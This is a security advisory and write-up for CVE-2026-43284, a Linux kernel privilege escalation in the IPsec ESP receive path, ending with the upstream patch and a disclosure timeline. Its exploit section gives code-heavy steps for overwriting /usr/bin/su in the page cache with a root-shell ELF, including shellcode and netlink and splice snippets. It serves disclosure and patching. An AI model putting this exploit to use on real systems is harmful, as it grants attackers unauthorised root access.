
The xfrm-ESP Page-Cache Write vulnerability is a kernel local privilege escalation (LPE) in the IPsec ESP receive path. When a splice()-planted page cache page lands in frags[0] of a non-linear skb, esp_input() skips the copy-on-write buffer allocation and runs AEAD decryption directly on the frag. A 4-byte sequence-number rearrangement step inside crypto_authenc_esn_decrypt() then writes attacker-chosen bytes permanently into the read-only page cache, even though authentication fails afterward. An unprivileged user who can create a user namespace can exploit this to overwrite the first 192 bytes of /usr/bin/su with a root-shell ELF and execute it.
CVE-2026-43284 was disclosed on 2026-04-30. The upstream fix landed on 2026-05-07 and was merged into mainline on 2026-05-08. Patch your kernel or apply the diff shown at the bottom of this page.

Root cause

Before performing in-place AEAD decryption on an ESP payload, esp_input() is supposed to call skb_cow_data() whenever the skb is non-linear, so that the frag data is copied into a private kernel buffer before any in-place modifications. The following branch creates a path that bypasses that copy:
esp4.c
static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
{
        [...]

        if (!skb_cloned(skb)) {
                if (!skb_is_nonlinear(skb)) {    // <=[1]
                        nfrags = 1;

                        goto skip_cow;
                } else if (!skb_has_frag_list(skb)) {
                        nfrags = skb_shinfo(skb)->nr_frags;
                        nfrags++;

                        goto skip_cow;           // <=[2]
                }
        }

        err = skb_cow_data(skb, 0, &trailer);
At [1], the code correctly skips skb_cow_data when the skb is fully linear (no frags). The bug is the branch at [2]: when the skb is non-linear but has no frag_list, the code also jumps directly to skip_cow and performs in-place crypto on whatever page is sitting in frags[0]. If an attacker has pinned a read-only page cache page into that frag via splice, that page becomes both src and dst for the AEAD operation.
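The branch logic above can be modeled as a pure predicate. The sketch below is illustrative only: the three booleans stand in for the skb_cloned(), skb_is_nonlinear() and skb_has_frag_list() helpers, and the function name is mine.

```c
#include <assert.h>
#include <stdbool.h>

/* Sketch of the skip-cow decision in esp_input().  Returns true when
 * skb_cow_data() runs, i.e. when the frag data is copied into a private
 * buffer before the in-place AEAD operation. */
static bool esp_input_cows(bool cloned, bool nonlinear, bool has_frag_list)
{
    if (!cloned) {
        if (!nonlinear)
            return false;            /* [1] fully linear: safe to skip   */
        else if (!has_frag_list)
            return false;            /* [2] BUG: spliced frag kept as-is */
    }
    return true;                     /* skb_cow_data() copies the data   */
}
```

The exploit's skb is uncloned, non-linear, and carries a single frag with no frag_list, so it takes path [2]: the predicate returns false and the page cache page is decrypted in place.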

The 4-byte STORE

The write happens not during decryption itself but during a byte-rearrangement step inside crypto_authenc_esn_decrypt(). The ESP + ESN + authencesn(...) combination moves the high-order 32 bits of the sequence number to the end of the source SGL before passing it to the AEAD:
crypto/authencesn.c
static int crypto_authenc_esn_decrypt(struct aead_request *req)
{
        [...]

        /* Move high-order bits of sequence number to the end. */
        scatterwalk_map_and_copy(tmp, src, 0, 8, 0);
        if (src == dst) {
                scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
                scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);   // <=[3]
                dst = scatterwalk_ffwd(areq_ctx->dst, dst, 4);
        [...]
The STORE at [3] writes 4 bytes at position assoclen + cryptlen within the destination SGL. You control exactly where that position falls by tuning the ESP payload length so that the page cache page occupies that offset. The 4 bytes written are those at tmp + 1: bytes 4–7 of the header copied at the top of the function, which hold the high-order 32 bits of the ESP sequence number. Tracing the value back through esp_input_set_header():
net/ipv4/esp4.c
static void esp_input_set_header(struct sk_buff *skb, __be32 *seqhi)
{
        struct xfrm_state *x = xfrm_input_state(skb);
        struct ip_esp_hdr *esph;

        /* For ESN we move the header forward by 4 bytes to
         * accommodate the high bits.  We will move it back after
         * decryption.
         */
        if ((x->props.flags & XFRM_STATE_ESN)) {
                esph = skb_push(skb, 4);
                *seqhi = esph->spi;
                esph->spi = esph->seq_no;
                esph->seq_no = XFRM_SKB_CB(skb)->seq.input.hi;
        }
}
XFRM_SKB_CB(skb)->seq.input.hi is set from replay_esn->seq_hi, which you freely specify at SA registration time via the XFRMA_REPLAY_ESN_VAL netlink attribute. This gives you full control over both the location (file offset) and the value (4 bytes) of every STORE. AEAD authentication runs after the STORE and always returns -EBADMSG, but by then the page cache modification is permanent.
The STORE survives until the kernel evicts the page (e.g., via drop_caches or reboot). Every subsequent read() or mmap() of the affected file sees the modified bytes.
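On a flat buffer, the src == dst branch of the rearrangement reduces to two memcpy()s. The following sketch (my naming; the scatterlist walk collapsed onto a single array) shows that the 4 bytes landing at assoclen + cryptlen are exactly the seq_hi that esp_input_set_header() planted in the header:

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Flat-buffer model of the src == dst branch of crypto_authenc_esn_decrypt().
 * After esp_input_set_header(), buf begins [ spi(4) | seq_hi(4) | ... ]. */
static void esn_rearrange(uint8_t *buf, size_t assoclen, size_t cryptlen)
{
    uint32_t tmp[2];

    memcpy(tmp, buf, 8);                           /* read first 8 bytes       */
    memcpy(buf + 4, &tmp[0], 4);                   /* duplicate low word at +4 */
    memcpy(buf + assoclen + cryptlen, &tmp[1], 4); /* <=[3] the 4-byte STORE   */
}
```

If assoclen + cryptlen is tuned so that it falls inside the attacker-pinned frag, the STORE hits the page cache page directly.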

Privilege required

esp_input() is reached only when an XFRM SA is registered, which requires CAP_NET_ADMIN. You obtain that capability inside an unprivileged user namespace:
/* write_proc() is shorthand for open(path) + write(buf) + close();
 * s is a UDP socket created after the unshare(). */
unshare(CLONE_NEWUSER | CLONE_NEWNET);
write_proc("/proc/self/setgroups", "deny");
write_proc("/proc/self/uid_map", "0 <real_uid> 1");
write_proc("/proc/self/gid_map", "0 <real_gid> 1");
ioctl(s, SIOCSIFFLAGS, &(struct ifreq){ .ifr_name="lo",
                                        .ifr_flags=IFF_UP|IFF_RUNNING });
The identity mapping (0 <real_uid> 1) means the process is root inside the new namespace and can register XFRM SAs within that netns.
On Ubuntu configurations where AppArmor blocks unprivileged user namespace creation, unshare(CLONE_NEWUSER) returns -EPERM and the ESP variant cannot run. See Chaining the two variants for how the RxRPC variant covers this blind spot.

Exploit overview

The target is /usr/bin/su. The exploit replaces the first 192 bytes (file offset 0) of its page cache with a static x86-64 root-shell ELF, leaving the setuid-root bit intact. The new ELF maps 0xb8 bytes at virtual address 0x400000 as R+X via a single PT_LOAD segment. The entry point is at 0x400078 (file offset 0x78). What the shellcode does at entry 0x400078:
// x86-64 shellcode at entry 0x400078
xor  edi, edi              // arg = 0
xor  esi, esi
xor  eax, eax
mov  al, 0x6a              // syscall: setgid(0)
syscall
mov  al, 0x69              // syscall: setuid(0)
syscall
mov  al, 0x74              // syscall: setgroups(0, NULL)
syscall
// ... execve("/bin/sh", NULL, ["TERM=xterm", NULL])
The 192 bytes are split into 48 × 4-byte chunks. Each chunk is written with one XFRM SA trigger.
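The chunking arithmetic is straightforward; a small sketch (helper names are mine) makes the offsets explicit:

```c
#include <assert.h>
#include <stddef.h>

#define PATCH_LEN   192   /* bytes of /usr/bin/su overwritten        */
#define CHUNK_LEN   4     /* one STORE writes 4 bytes                */
#define NUM_CHUNKS  (PATCH_LEN / CHUNK_LEN)   /* 48 SA triggers      */

/* File offset patched by chunk i. */
static size_t chunk_off(int i) { return (size_t)i * CHUNK_LEN; }

/* Which chunk covers a given file offset (e.g. the entry at 0x78). */
static int chunk_of(size_t off) { return (int)(off / CHUNK_LEN); }
```

The shellcode entry at file offset 0x78 is therefore written by chunk 30, and the last chunk (47) covers offsets 188–191.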
Step 1: Set up user + net namespace

Fork a child process, call unshare(CLONE_NEWUSER | CLONE_NEWNET), write identity uid/gid maps, and bring lo up with SIOCSIFFLAGS.
Step 2: Register 48 XFRM SAs

Create one SA per 4-byte chunk. Each SA has a unique SPI (0xDEADBE10 + i), mode XFRM_MODE_TRANSPORT, flag XFRM_STATE_ESN, algorithm authencesn(hmac(sha256),cbc(aes)), UDP encap sport=dport=4500, and seq_hi set to the 4 bytes you want to write:
struct xfrm_replay_state_esn esn = {
    .bmp_len = 1, .seq = 100, .replay_window = 32,
    .seq_hi = patch_seqhi,        /* The 4 bytes that will be STOREd */
};
/* put_attr(): exploit helper that appends a netlink attribute to nlh. */
put_attr(nlh, XFRMA_REPLAY_ESN_VAL, &esn, sizeof(esn) + 4);  /* +4: one bmp[] word */
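The sizeof(esn) + 4 accounts for the flexible bmp[] tail: with bmp_len = 1 the attribute must carry one extra 32-bit bitmap word. The sketch below mirrors the uapi struct layout locally; treat the field order as an assumption and check <linux/xfrm.h> on your kernel:

```c
#include <assert.h>
#include <stdint.h>

/* Local mirror of struct xfrm_replay_state_esn from <linux/xfrm.h>. */
struct replay_esn_mirror {
    uint32_t bmp_len;        /* number of 32-bit words in bmp[]    */
    uint32_t oseq;
    uint32_t seq;
    uint32_t oseq_hi;
    uint32_t seq_hi;         /* the 4 bytes every STORE writes     */
    uint32_t replay_window;
    uint32_t bmp[];          /* flexible replay bitmap             */
};

/* Payload length of XFRMA_REPLAY_ESN_VAL for a given bmp_len. */
static unsigned int esn_attr_len(uint32_t bmp_len)
{
    return sizeof(struct replay_esn_mirror) + bmp_len * sizeof(uint32_t);
}
```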
Step 3: Trigger each STORE with vmsplice + splice

For each chunk i, create a fresh sk_recv (bound to 127.0.0.1:4500 with UDP_ENCAP_ESPINUDP) and sk_send (connected to 127.0.0.1:4500). Build a 24-byte forged ESP wire header in a pipe with vmsplice, then splice 16 bytes from file offset i*4 of /usr/bin/su into the next pipe slot, and finally splice the pipe into sk_send:
uint8_t hdr[24];
*(uint32_t *)(hdr + 0) = htonl(spi);          /* per-chunk SPI */
*(uint32_t *)(hdr + 4) = htonl(SEQ_VAL);      /* wire seq_no_lo */
memset(hdr + 8, 0xCC, 16);                    /* IV (value irrelevant) */

vmsplice(pfd[1], &(struct iovec){hdr, 24}, 1, 0);
splice(file_fd, &(off_t){i*4}, pfd[1], NULL, 16, SPLICE_F_MOVE);
splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
splice_to_socket() automatically sets MSG_SPLICE_PAGES, planting the page cache page P of /usr/bin/su directly into frags[0] of the sender skb.
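The pipe staging itself can be exercised without any IPsec state. The sketch below substitutes a scratch file for /usr/bin/su and reads the pipe back instead of splicing it into a socket, showing the 24-byte header and the 16 spliced file bytes arriving back-to-back; the function and path names are mine:

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <sys/uio.h>
#include <unistd.h>

/* Stage hdr(24) + 16 bytes of file_path at offset off into a pipe, then
 * read the 40 bytes back into out.  Returns bytes read, or -1 on failure. */
static ssize_t stage_pipe(const char *file_path, off_t off,
                          const uint8_t hdr[24], uint8_t out[40])
{
    int pfd[2];
    int fd = open(file_path, O_RDONLY);

    if (fd < 0 || pipe(pfd) < 0)
        return -1;
    struct iovec iov = { .iov_base = (void *)hdr, .iov_len = 24 };
    if (vmsplice(pfd[1], &iov, 1, 0) != 24)         /* header into pipe   */
        return -1;
    if (splice(fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE) != 16)
        return -1;                                  /* file page into pipe */
    close(pfd[1]);
    ssize_t n = read(pfd[0], out, 40);
    close(pfd[0]);
    close(fd);
    return n;
}
```

In the real exploit the final read() is replaced by splice(pfd[0], ..., sk_send, ...), which is what keeps the page cache page referenced (rather than copied) all the way into the skb.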
Step 4: Verify and execute

After all 48 triggers, read back bytes at file offset 0x78 and 0x79. If they are 0x31 and 0xff (the xor edi, edi at the shellcode entry), the patch succeeded. The parent process then executes /usr/bin/su - via forkpty + execve, which maps the modified page cache, gains euid=0 from the setuid bit, and runs the shellcode.

What the skb looks like on the receive side

After the splice, the skb that udp_rcv sees has this layout:
skb {
    head/linear: ESP_hdr(8) + IV(16)               // 24 bytes
    frags[0]:    { page=&P, off=i*4, size=16 }     // page cache page of /usr/bin/su
}

Call chain

udp_rcv(skb)
  xfrm4_udp_encap_rcv(sk, skb)
    xfrm_input(skb, IPPROTO_ESP, spi, 0)
      esp_input(x, skb)
        pskb_may_pull(skb, sizeof(esp_hdr) + ivlen)
        if (!skb_cloned(skb) && !skb_has_frag_list(skb))   // Vulnerable: frag(page=P) preserved
          goto skip_cow;
        esp_input_set_header(skb, seqhi)
          skb_push(skb, 4);
          esph->seq_no = XFRM_SKB_CB(skb)->seq.input.hi;   // seq_hi = patch_seqhi
        skb_to_sgvec(skb, sg, 0, skb->len)
        aead_request_set_crypt(req, sg, sg, elen+ivlen, iv) // src == dst → in-place
        crypto_aead_decrypt(req)
          crypto_authenc_esn_decrypt(req)
            scatterwalk_map_and_copy(tmp+1, dst, assoclen+cryptlen, 4, /*out=*/1)
              // 4-byte STORE: page P[i*4 .. i*4+3] = patch_seqhi
        return -EBADMSG                                     // ignored; STORE already done
The AEAD authentication result is always -EBADMSG because the exploit does not know the SA’s HMAC key. The error is ignored — the STORE has already been committed to the page cache by the time crypto_authenc_esn_decrypt returns.

Patch

The fix sets the SKBFL_SHARED_FRAG flag on page frags that arrive via splice in the IPv4/IPv6 datagram append paths. The skip-cow branch in esp_input / esp6_input then checks this flag and routes shared-frag skbs through skb_cow_data instead of operating on the attacker-pinned page directly.
diff --git a/net/ipv4/esp4.c b/net/ipv4/esp4.c
index 6dfc0bcde..6a5febbdb 100644
--- a/net/ipv4/esp4.c
+++ b/net/ipv4/esp4.c
@@ -873,7 +873,8 @@ static int esp_input(struct xfrm_state *x, struct sk_buff *skb)
 			nfrags = 1;
 
 			goto skip_cow;
-		} else if (!skb_has_frag_list(skb)) {
+		} else if (!skb_has_frag_list(skb) &&
+			   !skb_has_shared_frag(skb)) {
 			nfrags = skb_shinfo(skb)->nr_frags;
 			nfrags++;
 
diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
index e4790cc7b..5bcd73cbd 100644
--- a/net/ipv4/ip_output.c
+++ b/net/ipv4/ip_output.c
@@ -1233,6 +1233,8 @@ static int __ip_append_data(struct sock *sk,
 			if (err < 0)
 				goto error;
 			copy = err;
+			if (!(flags & MSG_NO_SHARED_FRAGS))
+				skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
 			wmem_alloc_delta += copy;
 		} else if (!zc) {
 			int i = skb_shinfo(skb)->nr_frags;
diff --git a/net/ipv6/esp6.c b/net/ipv6/esp6.c
index 9f7531373..9c06c5a14 100644
--- a/net/ipv6/esp6.c
+++ b/net/ipv6/esp6.c
@@ -915,7 +915,8 @@ static int esp6_input(struct xfrm_state *x, struct sk_buff *skb)
 			nfrags = 1;
 
 			goto skip_cow;
-		} else if (!skb_has_frag_list(skb)) {
+		} else if (!skb_has_frag_list(skb) &&
+			   !skb_has_shared_frag(skb)) {
 			nfrags = skb_shinfo(skb)->nr_frags;
 			nfrags++;
 
diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
index 7e92909ab..1f2a33fbe 100644
--- a/net/ipv6/ip6_output.c
+++ b/net/ipv6/ip6_output.c
@@ -1794,6 +1794,8 @@ static int __ip6_append_data(struct sock *sk,
 			if (err < 0)
 				goto error;
 			copy = err;
+			if (!(flags & MSG_NO_SHARED_FRAGS))
+				skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
 			wmem_alloc_delta += copy;
 		} else if (!zc) {
 			int i = skb_shinfo(skb)->nr_frags;
The final merged patch uses the SKBFL_SHARED_FRAG approach submitted by Kuan-Ting Chen four days after the original patch. The commit is f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4 in the netdev tree and mainline.
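The effect of the fix on the skip-cow decision can again be modeled as a predicate (a sketch with my naming; booleans stand in for the skb_* helpers, including the new skb_has_shared_frag() check):

```c
#include <assert.h>
#include <stdbool.h>

/* Patched skip-cow decision: a shared (spliced) frag now forces the
 * skb_cow_data() copy even when there is no frag_list. */
static bool esp_input_cows_patched(bool cloned, bool nonlinear,
                                   bool has_frag_list, bool has_shared_frag)
{
    if (!cloned) {
        if (!nonlinear)
            return false;                         /* linear: still skipped  */
        else if (!has_frag_list && !has_shared_frag)
            return false;                         /* private frags: skipped */
    }
    return true;                                  /* spliced page is copied */
}
```

The exploit's skb now returns true (SKBFL_SHARED_FRAG is set by the append path), so decryption operates on a private copy and the page cache page is never written.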

Disclosure timeline

Detailed information about the ESP vulnerability and a weaponized exploit were submitted to security@kernel.org. A patch was submitted to the netdev mailing list and the issue was made public.
Kuan-Ting Chen submitted an independent vulnerability report with a reproducer to security@kernel.org.
Kuan-Ting Chen submitted the SKBFL_SHARED_FRAG-based follow-up patch to the netdev mailing list.
The patch was merged into the netdev tree. Separately, an unrelated third party published the exploit publicly, breaking the linux-distros embargo. Full disclosure followed after agreement from distribution maintainers.
Commit f4c50a4034e6 was merged into mainline. CVE-2026-43284 was assigned.
